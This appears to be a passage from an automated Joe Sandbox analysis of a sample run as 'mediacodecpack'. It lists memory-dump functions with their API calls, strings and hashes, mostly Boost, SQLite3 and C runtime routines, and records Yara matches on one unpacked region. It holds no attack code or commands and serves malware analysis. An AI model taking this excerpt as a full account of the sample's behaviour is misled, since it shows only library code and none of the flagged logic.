                                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02D4BDE3
                                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D4BDEA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                            • API String ID: 1953324306-412195191
                                                                                            • Opcode ID: 973e80dfeeeafe483ca357bc4b7a8a1a0d27e985902ec4f255b5927dfad5a9a9
                                                                                            • Instruction ID: 2c9942a01953ccc92f8f03c189ed91c32940ab676c4908654d1de4e28f6c543b
                                                                                            • Opcode Fuzzy Hash: 973e80dfeeeafe483ca357bc4b7a8a1a0d27e985902ec4f255b5927dfad5a9a9
                                                                                            • Instruction Fuzzy Hash: E4219E71E052149BEB04EBE8E4586AEBBB5EF64704F04455EED05A7340DF745E08CFA1
                                                                                            APIs
                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                            • String ID:
                                                                                            • API String ID: 3265351223-3916222277
                                                                                            • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                            • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                            • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                            • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp
                                                                                            • String ID: log
                                                                                            • API String ID: 912767213-2403297477
                                                                                            • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                            • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                            • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                            • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4396A
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02D439C1
                                                                                              • Part of subcall function 02D41410: std::exception::exception.LIBCMT ref: 02D41428
                                                                                              • Part of subcall function 02D49622: __EH_prolog.LIBCMT ref: 02D49627
                                                                                              • Part of subcall function 02D49622: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D49636
                                                                                              • Part of subcall function 02D49622: __CxxThrowException@8.LIBCMT ref: 02D49655
                                                                                            Strings
                                                                                            • Day of month is not valid for year, xrefs: 02D439AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Day of month is not valid for year
                                                                                            • API String ID: 1404951899-1521898139
                                                                                            • Opcode ID: ddb2ae83ecc70d81f61e0a3e1fdca63785830bee5e388a3127b6775194352007
                                                                                            • Instruction ID: 13afe437343a32f608f106e69a616672af9b974a22f815213212701a4896a92e
                                                                                            • Opcode Fuzzy Hash: ddb2ae83ecc70d81f61e0a3e1fdca63785830bee5e388a3127b6775194352007
                                                                                            • Instruction Fuzzy Hash: 3B019E36814249ABDF04EFA4D809AEEBB79FF18710F10441AEC04A3300EB748F55CBA5
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_strnicmp
                                                                                            • String ID: SQLITE_
                                                                                            • API String ID: 1961171630-787686576
                                                                                            • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                            • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                            • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                            • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                            APIs
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                            • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                            Strings
                                                                                            • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID: Invalid argument to rtreedepth()
                                                                                            • API String ID: 1063208240-2843521569
                                                                                            • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                            • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                            • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                            • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                            APIs
                                                                                            • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                              • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                              • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                              • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                              • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                            • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: soft_heap_limit
                                                                                            • API String ID: 1251656441-405162809
                                                                                            • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                            • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                            • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                            • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                            APIs
                                                                                            • std::exception::exception.LIBCMT ref: 02D4EB1B
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02D4EB30
                                                                                              • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 4063778783-2104205924
                                                                                            • Opcode ID: 11df5adf9008f098e62f74762073052ef06ff26eb6b330fde8970593a5f1f747
                                                                                            • Instruction ID: 68380270e26a96588dff8f058ab3a561e1052ae8dd24efb9a15f46709572fe79
                                                                                            • Opcode Fuzzy Hash: 11df5adf9008f098e62f74762073052ef06ff26eb6b330fde8970593a5f1f747
                                                                                            • Instruction Fuzzy Hash: 2EF082B5A4021A67DF04AAA88859DAF73ECDB04614F500569A911F3381EFB1EE0485A1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D43C1B
                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02D43C30
                                                                                              • Part of subcall function 02D514C7: std::exception::exception.LIBCMT ref: 02D514D1
                                                                                              • Part of subcall function 02D4965B: __EH_prolog.LIBCMT ref: 02D49660
                                                                                              • Part of subcall function 02D4965B: __CxxThrowException@8.LIBCMT ref: 02D49689
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                            • String ID: bad cast
                                                                                            • API String ID: 1300498068-3145022300
                                                                                            • Opcode ID: 40e917e8963a80452275586591018ba90173fe1eacf12cde9539ed866d6b1dfb
                                                                                            • Instruction ID: d2d4516f851dceb46319a15dc2cb22d9f315ad642c5870afcd978d0d2c561c27
                                                                                            • Opcode Fuzzy Hash: 40e917e8963a80452275586591018ba90173fe1eacf12cde9539ed866d6b1dfb
                                                                                            • Instruction Fuzzy Hash: 8EF02732900104CBC708DF58D4446EAB775EF12325F1000AEED0A57300CB728E06CAA0
                                                                                            APIs
                                                                                            • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                            • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: NULL
                                                                                            • API String ID: 632333372-324932091
                                                                                            • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                            • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                            • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                            • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D438D2
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02D438F1
                                                                                              • Part of subcall function 02D41410: std::exception::exception.LIBCMT ref: 02D41428
                                                                                              • Part of subcall function 02D47990: _memmove.LIBCMT ref: 02D479B0
                                                                                            Strings
                                                                                            • Year is out of valid range: 1400..10000, xrefs: 02D438E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Year is out of valid range: 1400..10000
                                                                                            • API String ID: 3258419250-2344417016
                                                                                            • Opcode ID: 8c7223cf4c1e261b9f60192810cad19eedfa8630f6a859ae9fd040187b2442e7
                                                                                            • Instruction ID: b61f2f8f183a1bca27c914e9e39decc45a4289b12e1e5cc17be8f8c68ca8822e
                                                                                            • Opcode Fuzzy Hash: 8c7223cf4c1e261b9f60192810cad19eedfa8630f6a859ae9fd040187b2442e7
                                                                                            • Instruction Fuzzy Hash: 87E09272A401146BEB14AB94C9197EDBB79DB09710F00045AE80663380DEB55D548BE0
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D43886
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02D438A5
                                                                                              • Part of subcall function 02D41410: std::exception::exception.LIBCMT ref: 02D41428
                                                                                              • Part of subcall function 02D47990: _memmove.LIBCMT ref: 02D479B0
                                                                                            Strings
                                                                                            • Day of month value is out of range 1..31, xrefs: 02D43894
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Day of month value is out of range 1..31
                                                                                            • API String ID: 3258419250-1361117730
                                                                                            • Opcode ID: a3fa71672496522d6a0a287fd0fceeee468ffd58b9a54fb03acd92a0857203cc
                                                                                            • Instruction ID: 8d28cbc44263b8bc8dfbb443572e3433f2030dcd176df833a87891c169c8b212
                                                                                            • Opcode Fuzzy Hash: a3fa71672496522d6a0a287fd0fceeee468ffd58b9a54fb03acd92a0857203cc
                                                                                            • Instruction Fuzzy Hash: 3AE09272A401146BE714AB98C8197EDB769DB08710F00099AE80673380DEB55D548BE1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4391E
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02D4393D
                                                                                              • Part of subcall function 02D41410: std::exception::exception.LIBCMT ref: 02D41428
                                                                                              • Part of subcall function 02D47990: _memmove.LIBCMT ref: 02D479B0
                                                                                            Strings
                                                                                            • Month number is out of range 1..12, xrefs: 02D4392C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Month number is out of range 1..12
                                                                                            • API String ID: 3258419250-4198407886
                                                                                            • Opcode ID: 507d1c422f59455cb16f6e61d9ccc4c0b5af46c0b12d3c22729cca4bf8625173
                                                                                            • Instruction ID: b60e8da0c46a714bce58c98f134699110000f69664c9ac8d8bc00fa01a56d97d
                                                                                            • Opcode Fuzzy Hash: 507d1c422f59455cb16f6e61d9ccc4c0b5af46c0b12d3c22729cca4bf8625173
                                                                                            • Instruction Fuzzy Hash: 85E0D872E4011497E724EB94C9197FDBB79DB08710F00045AD80673380DFB55D548BE0
                                                                                            APIs
                                                                                            • TlsAlloc.KERNEL32 ref: 02D419CC
                                                                                            • GetLastError.KERNEL32 ref: 02D419D9
                                                                                              • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocErrorH_prologLast
                                                                                            • String ID: tss
                                                                                            • API String ID: 249634027-1638339373
                                                                                            • Opcode ID: f3cf6151a8af61710caaf2ac3a47d24638ef4a72988e3d8b8041b243a90f064e
                                                                                            • Instruction ID: 70118ae71cceb91aab48b7b8dce0fee7a79dd50f74457c0c7efed5b772a8ede2
                                                                                            • Opcode Fuzzy Hash: f3cf6151a8af61710caaf2ac3a47d24638ef4a72988e3d8b8041b243a90f064e
                                                                                            • Instruction Fuzzy Hash: 2FE04F329046105B87007B78A80C59ABB949A41271F108B6AECB9933D0EE308D908BE2
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D43BD8
                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02D43BED
                                                                                              • Part of subcall function 02D514C7: std::exception::exception.LIBCMT ref: 02D514D1
                                                                                              • Part of subcall function 02D4965B: __EH_prolog.LIBCMT ref: 02D49660
                                                                                              • Part of subcall function 02D4965B: __CxxThrowException@8.LIBCMT ref: 02D49689
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                            • String ID: bad cast
                                                                                            • API String ID: 1300498068-3145022300
                                                                                            • Opcode ID: 8d3f0c2f43a2bd31ab0e1766cc26be9f27d8c3454b0d06d3ca6f299ff24aa543
                                                                                            • Instruction ID: 02e7f916271084d12a14c83890ce42c73ee77e265bf019e0aabc5f7587a711e4
                                                                                            • Opcode Fuzzy Hash: 8d3f0c2f43a2bd31ab0e1766cc26be9f27d8c3454b0d06d3ca6f299ff24aa543
                                                                                            • Instruction Fuzzy Hash: 6BE09A30900148DBC704EF94D54ABBDBB71EB06314F1080A99C0A53380CB314D05CA91
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                            • String ID:
                                                                                            • API String ID: 682475483-0
                                                                                            • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                            • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                                            • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                            • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2